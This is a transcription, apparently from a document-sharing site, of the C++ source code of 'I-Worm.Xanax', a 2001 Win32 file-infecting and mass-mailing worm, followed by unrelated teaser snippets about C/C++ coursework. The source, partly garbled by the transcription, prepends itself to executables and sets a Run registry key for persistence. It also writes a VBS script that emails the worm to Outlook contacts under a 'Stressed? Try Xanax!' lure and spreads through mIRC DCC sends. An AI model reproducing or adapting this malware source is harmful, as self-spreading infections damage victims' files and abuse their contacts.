I-Worm.Xanax.txt Sun Jul 20 12:43: /*
|
|
- Primrose Owen
- 5 years ago
- Views:
Transcription
1 I-Worm.Xanax.txt Sun Jul 20 12:43: /* */ #include <iostream> #include <windows.h> #include <direct.h> using namespace std; Virus Name: Xanax Version: A Type: Win32 EXE Prepender / I-Worm Author: Gigabyte Homepage: char hostfile[max_path], CopyHost[MAX_PATH], Virus[MAX_PATH]; char Buffer[MAX_PATH], checksum[2], Xanax[MAX_PATH], XanStart[MAX_PATH]; char mark[2], CopyName[10], FullPath[MAX_PATH], VersionBat[15],vnumber[11]; char WinScript[MAX_PATH], DirToInfect[MAX_PATH], RepairHost[MAX_PATH]; FILE *vfile; void VirCheck(char SRCFileName[]) FILE *SRC; char Buffer[1]; int v = 0; for (v = 0; v < 19; v ++) Counter = fread(buffer, 1, 1, SRC); strcpy(checksum, Buffer); for (v = 0; v < 1; v ++) Counter = fread(buffer, 1, 1, SRC); strcat(checksum, Buffer); void WriteVirus(char SRCFileName[], char DSTFileName[]) FILE *SRC, *DST; char Buffer[1024]; int v = 0; DST = fopen(dstfilename, "wb"); if(dst) for (v = 0; v < 33; v ++) fwrite(buffer, 1, Counter, DST); fclose(dst);
2 I-Worm.Xanax.txt Sun Jul 20 12:43: void AddOrig(char SRCFileName[], char DSTFileName[]) FILE *SRC, *DST; char Buffer[1024]; DST = fopen(dstfilename, "ab"); if(dst) while(! feof(src)) fwrite(buffer, 1, Counter, DST); fclose(dst); void CopyOrig(char SRCFileName[], char DSTFileName[]) FILE *SRC, *DST; char Buffer[1024]; int v = 0; DST = fopen(dstfilename, "wb"); if(dst) for (v = 0; v < 33; v ++) fwrite(buffer, 0, 0, DST); fclose(dst); while(! feof(src)) fwrite(buffer, 1, Counter, DST); bool FileExists(char *FileName) HANDLE Exists; Exists = CreateFile(FileName, GENERIC_READ, FILE_SHARE_READ FILE_SHARE_WRITE, 0, OPEN_EXISTING, 0, 0); if(exists == INVALID_HANDLE_VALUE) return false; CloseHandle(Exists); return true; void ScriptFile() GetWindowsDirectory(Buffer,MAX_PATH);
3 I-Worm.Xanax.txt Sun Jul 20 12:43: fprintf(vfile,"[script]\nn0=on 1:JOIN:#: /if ( $nick == $me ) halt \nn1=/dcc send $nick"); fprintf(vfile," %s%csystem%c%s\nn2=\n", Buffer, 92, 92, CopyName); void main(int argc, char **argv) strcpy(virus, argv[0]); GetWindowsDirectory(Buffer,MAX_PATH); char * regkey = "Software\\Microsoft\\Windows\\CurrentVersion\\Run" + NULL; strcpy(xanax,buffer); strcat(xanax,"\\system\\xanax.exe"); strcpy(xanstart,buffer); strcat(xanstart,"\\system\\xanstart.exe"); char * regdata = XanStart + NULL; strcpy(copyname, "xanax.exe"); strcpy(fullpath, Buffer); strcat(fullpath, "\\system\\"); strcat(fullpath, CopyName); WriteVirus(Virus, FullPath); int x = lstrlen(virus) - 6; if(virus[x]!= r ) if(virus[x]!= R ) CopyFile(Xanax,XanStart,FALSE); MessageBox(NULL,"8-Chloro-1-methyl-6-phenyl-4H-s-triazolo (4,3-alpha)(1,4 ) benzodiazepine","xanax",mb_ok); MessageBox(NULL,"8-Chloro-1-methyl-6-phenyl-4H-s-triazolo (4,3-alpha)(1,4 ) benzodiazepine","xanax",mb_ok); \n"); strcpy(winscript, Buffer); strcat(winscript, "\\wscript.exe"); if(fileexists(winscript)) if(fileexists("xanax.sys") == false) vfile = fopen("c:\\xanax.vbs","wt"); fprintf(vfile,"on Error Resume Next\n"); fprintf(vfile,"dim xanax, Mail, Counter, A, B, C, D, E, F fprintf(vfile,"set xanax = CreateObject(%coutlook.applica tion%c)\n", 34, 34); fprintf(vfile,"set Mail = xanax.getnamespace(%cmapi%c)\n", 34, 34); fprintf(vfile,"for A = 1 To Mail.AddressLists.Count\n"); fprintf(vfile,"set B = Mail.AddressLists(A)\n"); fprintf(vfile,"counter = 1\n"); fprintf(vfile,"set C = xanax.createitem(0)\n"); fprintf(vfile,"for D = 1 To B.AddressEntries.Count\n"); fprintf(vfile,"e = B.AddressEntries(Counter)\n"); fprintf(vfile,"c.recipients.add E\n"); fprintf(vfile,"counter = Counter + 1\n"); fprintf(vfile,"if Counter > 1000 Then Exit For\n"); fprintf(vfile,"next\n"); fprintf(vfile,"c.subject = %cstressed? Try Xanax!%c\n", 3 4, 34); fprintf(vfile,"c.body = %chi there! Are you so stressed t hat it makes you ill? You re not alone! Many people suffer from stress, these days. ",34)
4 I-Worm.Xanax.txt Sun Jul 20 12:43: ; fprintf(vfile,"maybe you find Prozac too strong? Then you NEED to try Xanax, it s milder. "); fprintf(vfile,"still not convinced? Check out the medical details in the attached file. Xanax might change your life!%c\n",34); fprintf(vfile,"c.attachments.add %c%s%csystem%c%s%c\n", 3 4, Buffer, 92, 92, CopyName, 34); fprintf(vfile,"c.deleteaftersubmit = True\n"); fprintf(vfile,"c.send\n"); fprintf(vfile,"e = %c%c\n", 34, 34); fprintf(vfile,"next\n"); fprintf(vfile,"set F = CreateObject(%cScripting.FileSyste mobject%c)\n", 34, 34); fprintf(vfile,"f.deletefile Wscript.ScriptFullName\n"); ShellExecute(NULL, "open", "xanax.vbs", NULL, NULL, SW_SHOWNORMAL ); if(fileexists("expostrt.exe") == false) WIN32_FIND_DATA FindData; HANDLE FoundFile; strcat(dirtoinfect, Buffer); strcat(dirtoinfect, "\\*.exe"); FoundFile = FindFirstFile(DirToInfect, &FindData); if(foundfile!= INVALID_HANDLE_VALUE) do if(finddata.dwfileattributes & FILE_ATTRIBUTE_DIRECTORY) GetWindowsDirectory(Buffer,MAX_PATH); _chdir("system"); strcpy(hostfile, Buffer); strcat(hostfile, "\\"); strcat(hostfile, FindData.cFileName); VirCheck(hostfile); strcpy(mark,"ny"); if(finddata.cfilename[3]!= D ) if(finddata.cfilename[0]!= P ) if(finddata.cfilename[0]!= R ) if(finddata.cfilename[0]!= E ) if(finddata.cfilename[0]!= T ) if(finddata.cfilename[0]!= W ) if(finddata.cfilename[0]!= w ) if(finddata.cfilename[5]!= R )
5 I-Worm.Xanax.txt Sun Jul 20 12:43: if(finddata.cfilename[0]!= S ) if(finddata.cfilename[0]!= s ) if(checksum[1]!= mark[1]) strcpy(copyhost, "host.tmp"); CopyFile(hostfile, CopyHost, FALSE); strcpy(virus, argv[0]); CopyFile(FullPath, hostfile, FALSE); AddOrig(CopyHost, hostfile); _unlink("host.tmp"); while (FindNextFile(FoundFile, &FindData)); FindClose(FoundFile); if(fileexists("c:\\mirc\\mirc32.exe")) FoundFile = FindFirstFile("c:\\mirc\\download\\*.exe", &FindData); if(foundfile!= INVALID_HANDLE_VALUE) do if(finddata.dwfileattributes & FILE_ATTRIBUTE_DIRECTORY) _chdir("system"); strcpy(hostfile, "c:\\mirc\\download\\"); strcat(hostfile, FindData.cFileName ); VirCheck(hostfile); strcpy(mark,"ny"); if(checksum[1]!= mark[1]) strcpy(copyhost, "host.tmp"); CopyFile(hostfile, CopyHost, FALSE); WriteVirus(Virus, hostfile); AddOrig(CopyHost, hostfile); _unlink("host.tmp"); while (FindNextFile(FoundFile, &FindData)); FindClose(FoundFile); vfile = fopen("c:\\mirc\\script.ini","wt"); vfile = fopen("c:\\progra 1\\mirc\\script.ini","wt");
6 I-Worm.Xanax.txt Sun Jul 20 12:43: vfile = fopen("d:\\mirc\\script.ini","wt"); vfile = fopen("d:\\progra 1\\mirc\\script.ini","wt"); vfile = fopen("e:\\mirc\\script.ini","wt"); vfile = fopen("e:\\progra 1\\mirc\\script.ini","wt"); vfile = fopen("f:\\mirc\\script.ini","wt"); vfile = fopen("f:\\progra 1\\mirc\\script.ini","wt"); vfile = fopen("winstart.bat","wt"); fprintf(vfile,"@cls\n"); fprintf(vfile,"@echo Do not take this medication with ethanol, Buspar (buspirone), TCA\n"); fprintf(vfile,"@echo antidepressants, narcotics, or other CNS depressants.\n"); fprintf(vfile,"@echo This combination can increase CNS depression. Be sure not to take other\n"); fprintf(vfile,"@echo sedative, benzodiazepines, or sleeping pills with this drug. The combinations\n"); fprintf(vfile,"@echo could be fatal. Do not smoke or drink alcohol when taking Xa nax. Alcohol can\n"); fprintf(vfile,"@echo lower blood pressure and decrease your breathing rate to the point of\n"); fprintf(vfile,"@echo unconsciousness. Tobacco and marijuana smoking can add to th e sedative\n"); fprintf(vfile,"@echo effects of Xanax.\n"); vfile = fopen("xanax.sys", "wt"); fprintf(vfile, "Win32.HLLP.Xanax (c) 2001 Gigabyte\n");
7 I-Worm.Xanax.txt Sun Jul 20 12:43: RegSetValue(HKEY_LOCAL_MACHINE, regkey, REG_SZ, regdata, lstrlen(regdata)); strcpy(repairhost, Buffer); strcat(repairhost, "\\system\\hostfile.exe"); CopyOrig(Virus, RepairHost); _chdir("system"); if(fileexists(repairhost)) WinExec(RepairHost, SW_SHOWNORMAL); _unlink("hostfile.exe");
Visualization Of Hard Disk Geometry And Master Boot Record
Visualization Of Hard Disk Geometry And Master Boot Record 1 Kamaruddin Malik Mohamad, 2 Mustafa Mat Deris Fakulti Sains Komputer dan Temnologi Maklumat, Universiti Tun Hussein Onn Malaysia (UTHM), 86400
More information1- Write a single C++ statement that: A. Calculates the sum of the two integrates 11 and 12 and outputs the sum to the consol.
1- Write a single C++ statement that: A. Calculates the sum of the two integrates 11 and 12 and outputs the sum to the consol. B. Outputs to the console a floating point number f1 in scientific format
More informationLinked List using a Sentinel
Linked List using a Sentinel Linked List.h / Linked List.h Using a sentinel for search Created by Enoch Hwang on 2/1/10. Copyright 2010 La Sierra University. All rights reserved. / #include
More informationCC Pilot XS. Backlight interface description
CC Pilot XS Backlight interface description Table of Contents Introduction... 3 Purpose... 3 References... 3 History... 3 Backlight device interface... 4 Summary of IOCTLs... 4 IOCTL_BACKLIGHT_GET_RESOLUTION...
More informationStrings and Stream I/O
Strings and Stream I/O C Strings In addition to the string class, C++ also supports old-style C strings In C, strings are stored as null-terminated character arrays str1 char * str1 = "What is your name?
More informationPROGRAMMING IN C++ CVIČENÍ
PROGRAMMING IN C++ CVIČENÍ INFORMACE Michal Brabec http://www.ksi.mff.cuni.cz/ http://www.ksi.mff.cuni.cz/~brabec/ brabec@ksi.mff.cuni.cz gmichal.brabec@gmail.com REQUIREMENTS FOR COURSE CREDIT Basic requirements
More informationCSE 12 Spring 2016 Week One, Lecture Two
CSE 12 Spring 2016 Week One, Lecture Two Homework One and Two: hw2: Discuss in section today - Introduction to C - Review of basic programming principles - Building from fgetc and fputc - Input and output
More informationCSCI-243 Exam 2 Review February 22, 2015 Presented by the RIT Computer Science Community
CSCI-43 Exam Review February, 01 Presented by the RIT Computer Science Community http://csc.cs.rit.edu C Preprocessor 1. Consider the following program: 1 # include 3 # ifdef WINDOWS 4 # include
More informationLab 6 Due Date: Wednesday, April 5, /usr/local/3302/include/direct linking loader.h Driver File:
Source File: ~/3302/lab06.C Specification File: /usr/local/3302/include/direct linking loader.h Driver File: /usr/local/3302/src/lab06main.c Implementation Starter File: /usr/local/3302/src/lab06.c.start
More informationCommon Misunderstandings from Exam 1 Material
Common Misunderstandings from Exam 1 Material Kyle Dewey Stack and Heap Allocation with Pointers char c = c ; char* p1 = malloc(sizeof(char)); char** p2 = &p1; Where is c allocated? Where is p1 itself
More informationAgenda. The main body and cout. Fundamental data types. Declarations and definitions. Control structures
The main body and cout Agenda 1 Fundamental data types Declarations and definitions Control structures References, pass-by-value vs pass-by-references The main body and cout 2 C++ IS AN OO EXTENSION OF
More informationCS2141 Software Development using C/C++ C++ Basics
CS2141 Software Development using C/C++ C++ Basics Integers Basic Types Can be short, long, or just plain int C++ does not define the size of them other than short
More informationLecture Notes CPSC 224 (Spring 2012) Today... Java basics. S. Bowers 1 of 8
Today... Java basics S. Bowers 1 of 8 Java main method (cont.) In Java, main looks like this: public class HelloWorld { public static void main(string[] args) { System.out.println("Hello World!"); Q: How
More informationCS302 - Data Structures using C++
CS302 - Data Structures using C++ Topic: Kostas Alexis Introduction to the problem The Towers of Hanoi is a mathematical puzzle where one has three pegs and n disks and the goal is to move the entire stack
More informationImage Steganalysis Image Steganography
//Joshua Tracy #include #include #include "opencv2/opencv.hpp" #include #include #include #include using
More informationUser Manual. English. Programmers Reference Perception RPC interface. I en
User Manual English Programmers Reference Perception RPC interface I2699-1.0 en Document version 1.0 April 2009 For Perception 6.0 or higher For HBM's Terms and Conditions visit www.hbm.com/terms HBM GmbH
More informationLab Instructor : Jean Lai
Lab Instructor : Jean Lai Group related statements to perform a specific task. Structure the program (No duplicate codes!) Must be declared before used. Can be invoked (called) as any number of times.
More informationA506 / C201 Computer Programming II Placement Exam Sample Questions. For each of the following, choose the most appropriate answer (2pts each).
A506 / C201 Computer Programming II Placement Exam Sample Questions For each of the following, choose the most appropriate answer (2pts each). 1. Which of the following functions is causing a temporary
More informationIntroduction to C++ 2. A Simple C++ Program. A C++ program consists of: a set of data & function definitions, and the main function (or driver)
Introduction to C++ 1. General C++ is an Object oriented extension of C which was derived from B (BCPL) Developed by Bjarne Stroustrup (AT&T Bell Labs) in early 1980 s 2. A Simple C++ Program A C++ program
More informationCS 322 Operating Systems Practice Midterm Questions
! CS 322 Operating Systems 1. Processes go through the following states in their lifetime. time slice ends Consider the following events and answer the questions that follow. Assume there are 5 processes,
More informationFile IO and command line input CSE 2451
File IO and command line input CSE 2451 File functions Open/Close files fopen() open a stream for a file fclose() closes a stream One character at a time: fgetc() similar to getchar() fputc() similar to
More informationtypedef Labeling<unsigned char,short> LabelingBS; typedef Labeling<unsigned char,short>::regioninfo RegionInfoBS;
2005 7 19 1 ( ) Labeling 2 C++ STL(Standard Template Library) g++ (GCC) 3.3.2 3 3.1 Labeling SrcT DstT SrcT: unsigned char, shoft DstT: short typedef 1. unsigned char, short typedef Labeling
More informationA: We see the ps auxw execute and print on screen. The program holds the command in buffer then it is printed on screen.
Brian Duenas CSE 460 Lab 4 20 points Total 2. Process Pipes Q: What do you see when you execute "pipe1"? Why? We see the ps auxw execute and print on screen. The program holds the command in buffer then
More informationReading Assignment 4. n Chapter 4 Threads, due 2/7. 1/31/13 CSE325 - Processes 1
Reading Assignment 4 Chapter 4 Threads, due 2/7 1/31/13 CSE325 - Processes 1 What s Next? 1. Process Concept 2. Process Manager Responsibilities 3. Operations on Processes 4. Process Scheduling 5. Cooperating
More information03 Remote invocation. Request-reply RPC. Coulouris 5 Birrel_Nelson_84.pdf RMI
03 Remote invocation Request-reply RPC Coulouris 5 Birrel_Nelson_84.pdf RMI 2/16 Remote Procedure Call Implementation client process Request server process client program client stub procedure Communication
More informationC++ Undefined Behavior What is it, and why should I care?
C++ Undefined Behavior What is it, and why should I care? Marshall Clow Qualcomm marshall@idio.com http://cplusplusmusings.wordpress.com (intermittent) Twitter: @mclow ACCU 2014 April 2014 What is Undefined
More informationCS Operating Systems Lab 3: UNIX Processes
CS 346 - Operating Systems Lab 3: UNIX Processes Due: February 15 Purpose: In this lab you will become familiar with UNIX processes. In particular you will examine processes with the ps command and terminate
More informationprimitive arrays v. vectors (1)
Arrays 1 primitive arrays v. vectors (1) 2 int a[10]; allocate new, 10 elements vector v(10); // or: vector v; v.resize(10); primitive arrays v. vectors (1) 2 int a[10]; allocate new, 10 elements
More informationJordan University of Science & Technology Department of Computer Science CS 211 Exam #1 (23/10/2010) -- Form A
Jordan University of Science & Technology Department of Computer Science CS 211 Exam #1 (23/10/2010) -- Form A Name: ID#: Section #: Day & Time: Instructor: Answer all questions as indicated. Closed book/closed
More informationECE 462 Exam 1. 6:30-7:30PM, September 22, 2010
ECE 462 Exam 1 6:30-7:30PM, September 22, 2010 I will not receive nor provide aid to any other student for this exam. Signature: You must sign here. Otherwise, the exam is not graded. This exam is printed
More informationC++ And Threads.
C++ And Threads by Randy Charles Morin If you ve ever done multithreaded programming then most likely it was in C++. I haven t heard of many developers using the CreateThread Win32 API function from Visual
More informationTDDB68. Lesson 1. Simon Ståhlberg
TDDB68 Lesson 1 Simon Ståhlberg Contents General information about the labs Overview of the labs Memory layout of C programs ("Lab 00") General information about Pintos System calls Lab 1 Debugging Administration
More informationDirect Memory Access. Lecture 2 Pointer Revision Command Line Arguments. What happens when we use pointers. Same again with pictures
Lecture 2 Pointer Revision Command Line Arguments Direct Memory Access C/C++ allows the programmer to obtain the value of the memory address where a variable lives. To do this we need to use a special
More information- It computes the Standard Deviation by calculating the difference of each channel (R,G,B and A) of a pixel.
Standard Deviation: It is common to find comparison of two bitmaps in Image Processing Development. Comparison of two bitmaps means how each pixel of image1 is different from corresponding pixel of image2
More informationIntroduction to Programming
Introduction to Programming Summer Term 2015 Dr. Adrian Kacso, Univ. Siegen adriana.dkacsoa@duni-siegena.de Tel.: 0271/740-3966, Office: H-B 8406 State: May 6, 2015 Betriebssysteme / verteilte Systeme
More informationCSE 12 Spring 2018 Week One, Lecture Two
CSE 12 Spring 2018 Week One, Lecture Two Homework One and Two: - Introduction to C - Review of basic programming principles - Building from fgetc and fputc - Input and output strings and numbers - Introduction
More informationSTD_CU43USBSW_V1.0E. CUnet (MKY43) USB Unit. CU-43USB Software Manual
STD_CU43USBSW_V1.0E CUnet (MKY43) USB Unit CU-43USB Software Manual Introduction This document describes API included with CU-43USB unit. Before using the product, please check the latest information on
More informationPractical Anti-virus Evasion
Practical Anti-virus Evasion by Daniel Sauder During a penetration test, situation might occur where it is possible to upload and remotely execute a binary file. For example, you can execute the file on
More informationOperating systems Portfolio
Operating systems Portfolio Thebault Yann Student number : 10004434 CE0100-3 Operating systems! Friday 26 November 2010 WEEK 1 6. How does the distinction between supervisor mode and user mode function
More informationExceptions. CS162: Introduction to Computer Science II. Exceptions. Exceptions. Exceptions. Exceptions. Exceptions
CS162: Introduction to Computer Science II A typical way to handle error conditions is through the return value. For example, suppose we create a loadfile() function that returns true if it loaded the
More informationFirst Exam name: John Franco
20-EECE-4029 Operating Systems Fall, 2012 John Franco First Exam name: John Franco Question 1: Semaphores What is the expected output of the following? sem_t g[6]; void Q () { sem_wait(&g[5]); sem_post(&g[5]);
More informationMaths 1264 Quiz 1 answers Thursday 22/1/15
Maths 1264 Quiz 1 answers Thursday 22/1/15 (it is ok to use notes and to collaborate) On Intel machines, ints and short ints are stored little endian, but in these hand-calculations they should be written
More informationCommunication With the Outside World
Communication With the Outside World Program Return Code Arguments From the Program Call Aborting Program Calling Other Programs Data Processing Course, I. Hrivnacova, IPN Orsay I. Hrivnacova @ Data Processing
More informationLecture 5 Files and Streams
Lecture 5 Files and Streams Introduction C programs can store results & information permanently on disk using file handling functions These functions let you write either text or binary data to a file,
More informationGabrielle Evaristo CSE 460. Lab Shared Memory
Gabrielle Evaristo CSE 460 Lab 7 1. Shared Memory Use man to study each of the shared memory functions and write a brief description on the usage of each of them. o shmget (shared memory get): Allocated
More information& WizChan. Driver Documentation
DYNAMIC ENGINEERING 150 DuBois St. Suite C, Santa Cruz, CA 95060 831-457-8891 Fax 831-457-4793 http://www.dyneng.com sales@dyneng.com Est. 1988 PmcWiz & WizChan Driver Documentation Win32 Driver Model
More informationLab 8. Follow along with your TA as they demo GDB. Make sure you understand all of the commands, how and when to use them.
Lab 8 Each lab will begin with a recap of last lab and a brief demonstration by the TAs for the core concepts examined in this lab. As such, this document will not serve to tell you everything the TAs
More informationANKARA UNIVERSITY COMPUTER ENGINEERING DEPARTMENT BLM334-COM334 PROJECT
ANKARA UNIVERSITY COMPUTER ENGINEERING DEPARTMENT BLM334-COM334 PROJECT Due date: 08.05.2013 Lab Hours You re expected to implement Producer-Consumer Problem that is described below. (Any form of cheating
More informationExceptions, Case Study-Exception handling in C++.
PART III: Structuring of Computations- Structuring the computation, Expressions and statements, Conditional execution and iteration, Routines, Style issues: side effects and aliasing, Exceptions, Case
More informationOverview (1A) Young Won Lim 9/14/17
Overview (1A) Copyright (c) 2009-2017 Young W. Lim. Permission is granted to copy, distribute and/or modify this document under the terms of the GNU Free Documentation License, Version 1.2 or any later
More informationIncrement and the While. Class 15
Increment and the While Class 15 Increment and Decrement Operators Increment and Decrement Increase or decrease a value by one, respectively. the most common operation in all of programming is to increment
More informationReview Questions for Final Exam
CS 102 / ECE 206 Spring 11 Review Questions for Final Exam The following review questions are similar to the kinds of questions you will be expected to answer on the Final Exam, which will cover LCR, chs.
More informationBOOLEAN EXPRESSIONS CONTROL FLOW (IF-ELSE) INPUT/OUTPUT. Problem Solving with Computers-I
BOOLEAN EXPRESSIONS CONTROL FLOW (IF-ELSE) INPUT/OUTPUT Problem Solving with Computers-I Announcements HW02: Complete (individually)using dark pencil or pen, turn in during lab section next Wednesday Please
More informationOverview (1A) Young Won Lim 9/9/17
Overview (1A) Copyright (c) 2009-2017 Young W. Lim. Permission is granted to copy, distribute and/or modify this document under the terms of the GNU Free Documentation License, Version 1.2 or any later
More informationChapter 2. Procedural Programming
Chapter 2 Procedural Programming 2: Preview Basic concepts that are similar in both Java and C++, including: standard data types control structures I/O functions Dynamic memory management, and some basic
More informationCSC 2405: Computer Systems II
CSC 2405: Computer Systems II Program Execution Environment Execution Environment The main func*on is the entry point for C program execu*on int main( int argc, char * argv[]); The linker (called by the
More informationCSC 126 FINAL EXAMINATION FINAL Spring 2012 B. Name (last, First) Instructor. Total Possible. Received
CSC 126 FINAL EXAMINATION FINAL Spring 2012 B Name (last, First) Instructor Question # Total Possible Total Received 1. 8 2. 8 3. 8 4. 14 5. 18 6. 10 7. 16 8. 18 TOTAL 100 Final Exam/ Page 2 1) (8 points)
More informationC:\Temp\Templates. Download This PDF From The Web Site
11 2 2 2 3 3 3 C:\Temp\Templates Download This PDF From The Web Site 4 5 Use This Main Program Copy-Paste Code From The Next Slide? Compile Program 6 Copy/Paste Main # include "Utilities.hpp" # include
More informationArray Initialization
Array Initialization Array declarations can specify initializations for the elements of the array: int primes[10] = { 2, 3, 5, 7, 11, 13, 17, 19, 23, 29 ; initializes primes[0] to 2, primes[1] to 3, primes[2]
More informationC++ Programming Fundamentals
C++ Programming Fundamentals 281 Elvis C. Foster Lecture 12: Exception Handling One of the things you are required to do as a responsible programmer is to ensure that your program allows only valid data
More informationBSc (Hons) Computer Science. with Network Security. Examinations for / Semester1
BSc (Hons) Computer Science with Network Security Cohort: BCNS/15B/FT Examinations for 2015-2016 / Semester1 MODULE: PROGRAMMING CONCEPT MODULE CODE: PROG 1115C Duration: 3 Hours Instructions to Candidates:
More informationOverview (1A) Young Won Lim 9/25/17
Overview (1A) Copyright (c) 2009-2017 Young W. Lim. Permission is granted to copy, distribute and/or modify this document under the terms of the GNU Free Documentation License, Version 1.2 or any later
More informationTHE INTEGER DATA TYPES. Laura Marik Spring 2012 C++ Course Notes (Provided by Jason Minski)
THE INTEGER DATA TYPES STORAGE OF INTEGER TYPES IN MEMORY All data types are stored in binary in memory. The type that you give a value indicates to the machine what encoding to use to store the data in
More informationLAB #8. GDB can do four main kinds of things (plus other things in support of these) to help you catch bugs in the act:
LAB #8 Each lab will begin with a brief demonstration by the TAs for the core concepts examined in this lab. As such, this document will not serve to tell you everything the TAs will in the demo. It is
More informationProgram threaded-fft-mutex.cc
1 // 2D FFT Using threads 2 // George F. Riley, Georgia Tech, Fall 2009 3 // This illustrates how a mutex would be implemented (both a "buggy" version 4 // and a good one). 5 6 #include 7 8
More informationCSCI 104 Exceptions. Mark Redekopp David Kempe
CSCI 104 Exceptions Mark Redekopp David Kempe Code for Today On your VM: $ mkdir except $ cd except $ wget http://ee.usc.edu/~redekopp/cs104/except.tar $ tar xvf except.tar 2 Recall Remember the List ADT
More informationHomework 5. Yuji Shimojo CMSC 330. Instructor: Prof. Reginald Y. Haseltine
Homework 5 Yuji Shimojo CMSC 330 Instructor: Prof. Reginald Y. Haseltine July 13, 2013 Question 1 Consider the following Java definition of a mutable string class. class MutableString private char[] chars
More informationvector<process*> Delete(vector<process*> DeleteQ, int ID); vector<process*> DeleteW(vector<process*> DeleteWQ, int IDW);
Matt Ramsay & Robert Brown CS 470 Process Management Project 2/15/02 File: main.cpp Uncommented Code: /*********************************** ** Matthew Ramsay Robert Brown ** ** CS470 Dr. Deborah Hwang **
More informationThe University of Nottingham
The University of Nottingham SCHOOL OF COMPUTER SCIENCE A LEVEL 2 MODULE, AUTUMN SEMESTER 2009-2010 C/C++ for Java Programmers Time allowed TWO hours Candidates may complete the front cover of their answer
More informationHW3a solution. L1 implies there must be an f1 in Base L2 implies there must be an f2 in Base. So we know there is an f1 and f2 in Base
HW 3 Solution int main(int argc, char **argv) { Base *b = new Base( ); Derived *d = new Derived( ); b->f1( ); // prints "Base f1" L1 b->f2( ); // prints "Base f2" L2 d->f1( ); // prints "Base f1" L3 d->f2(
More informationC++ Namespaces, Exceptions
C++ Namespaces, Exceptions CSci 588: Data Structures, Algorithms and Software Design http://www.cplusplus.com/doc/tutorial/namespaces/ http://www.cplusplus.com/doc/tutorial/exceptions/ http://www.cplusplus.com/doc/tutorial/typecasting/
More informationmoretosearch = (location < length);
Chapter 3(6th edition): Exercises 1,2,3,9,10,11,12,18-28 (due: 25/10/2017) Solution: 1. (a) Boolean IsThere(ItemType item) Function: Determines if item is in the list. Precondition: List has been initialized.
More informationปฏ บ ต การ #3. A Simple Shell Interpreter
ปฏ ต การ #3 A Simple Shell Interpreter Write a shell (read section 1.3.3 and 1.4 in text book) that is similar to Figure 1-10 but contains enough code that it actually works so you can test it. You might
More informationThread Fundamentals. CSCI 315 Operating Systems Design 1
Thread Fundamentals Notice: This set of slides is based on the notes by Professor Perrone of Bucknell and the textbook authors Silberschatz, Galvin, and Gagne, as well as the tutorial by Blaise Barney
More informationSolving a 2D Maze. const int WIDTH = 10; const int HEIGHT = 10;
Solving a 2D Maze Let s use a 2D array to represent a maze. Let s start with a 10x10 array of char. The array of char can hold either X for a wall, for a blank, and E for the exit. Initially we can hard-code
More informationCSCI 111 Midterm 1, version A Exam Fall Solutions 09.00am 09.50am, Tuesday, November 24, 2015
QUEENS COLLEGE Department of Computer Science CSCI 111 Midterm 1, version A Exam Fall 2015 11.24.15 Solutions 09.00am 09.50am, Tuesday, November 24, 2015 Problem 1 Write the best title lines for the functions
More informationCSC 438 Systems and Software Security, Spring 2014 Instructor: Dr. Natarajan Meghanathan Question Bank for Module 6: Software Security Attacks
CSC 438 Systems and Software Security, Spring 2014 Instructor: Dr. Natarajan Meghanathan Question Bank for Module 6: Software Security Attacks 1) What will be the output of the following C program when
More informationAgenda. The main body and cout. Fundamental data types. Declarations and definitions. Control structures
The main body and cout Agenda 1 Fundamental data types Declarations and definitions Control structures References, pass-by-value vs pass-by-references Memory regions 2 EACH C++ VARIABLE IS STORED IN A
More informationLab#5 Due Wednesday, February 25, at the start of class. Purpose: To develop familiarity with C++ pointer variables
Lab#5 Due Wednesday, February 25, at the start of class Purpose: To develop familiarity with C++ pointer variables Introduction: In this lab, you will learn by experimentation the answers to some questions
More informationCSE 333 Midterm Exam 7/22/12
Name There are 6 questions worth a total of 100 points. Please budget your time so you get to all of the questions. Keep your answers brief and to the point. The exam is closed book, closed notes, closed
More informations Protocol Buffer Knight76 at gmail.com
s Protocol Buffer Knight76 at gmail.com 1. RPC, Not RPC 2.. Proto (structed data) Proto Compiler C++ Java python References Protocol Buffers: A new open source release http://www.youtube.com/watch?v=k-
More informationThreaded Programming. Lecture 9: Alternatives to OpenMP
Threaded Programming Lecture 9: Alternatives to OpenMP What s wrong with OpenMP? OpenMP is designed for programs where you want a fixed number of threads, and you always want the threads to be consuming
More informationConnecting with Computer Science, 2e. Chapter 15 Programming II
Connecting with Computer Science, 2e Chapter 15 Programming II Objectives In this chapter you will: Gain an understanding of the basics of high-level programming languages, using Java and C++ as examples
More informationCHAPTER 3 BASIC INSTRUCTION OF C++
CHAPTER 3 BASIC INSTRUCTION OF C++ MOHD HATTA BIN HJ MOHAMED ALI Computer programming (BFC 20802) Subtopics 2 Parts of a C++ Program Classes and Objects The #include Directive Variables and Literals Identifiers
More informationMPI 2. CSCI 4850/5850 High-Performance Computing Spring 2018
MPI 2 CSCI 4850/5850 High-Performance Computing Spring 2018 Tae-Hyuk (Ted) Ahn Department of Computer Science Program of Bioinformatics and Computational Biology Saint Louis University Learning Objectives
More informationDefinition Matching (10 Points)
Name SOLUTION Closed notes and book. If you have any questions ask them. Write clearly and make sure the case of a letter is clear (where applicable) since C++ is case sensitive. There are no syntax errors
More information2 2
1 2 2 3 3 C:\Temp\Templates 4 5 Use This Main Program 6 # include "Utilities.hpp" # include "Student.hpp" Copy/Paste Main void MySwap (int Value1, int Value2); int main(int argc, char * argv[]) { int A
More informationLAB #8. Last Survey, I promise!!! Please fill out this really quick survey about paired programming and information about your declared major and CS.
LAB #8 Each lab will begin with a brief demonstration by the TAs for the core concepts examined in this lab. As such, this document will not serve to tell you everything the TAs will in the demo. It is
More informationTopics. Functions. Functions
Topics Notes #8 Functions Chapter 6 1) How can we break up a program into smaller sections? 2) How can we pass information to and from functions? 3) Where can we put functions in our code? CMPT 125/128
More information#include <iostream> #include <algorithm> #include <cmath> using namespace std; int f1(int x, int y) { return (double)(x/y); }
1. (9 pts) Show what will be output by the cout s in this program. As in normal program execution, any update to a variable should affect the next statement. (Note: boolalpha simply causes Booleans to
More informationSerial C Programming 03/11/2008. Lecture 15 1
2 #include ! int main(int argc, char* argv[])! // type definitions! // open serial port as COMXX (COM1 if built-in)! // establish whether 5 or 7 bits through argv[1],
More informationIntroduction to the C programming language
Introduction to the C programming language Lists and Trees Giuseppe Lipari http://retis.sssup.it/~lipari Scuola Superiore Sant Anna Pisa March 10, 2010 Outline 1 Searching 2 Lists 3 Balanced Binary Trees
More informationMPI 1. CSCI 4850/5850 High-Performance Computing Spring 2018
MPI 1 CSCI 4850/5850 High-Performance Computing Spring 2018 Tae-Hyuk (Ted) Ahn Department of Computer Science Program of Bioinformatics and Computational Biology Saint Louis University Learning Objectives
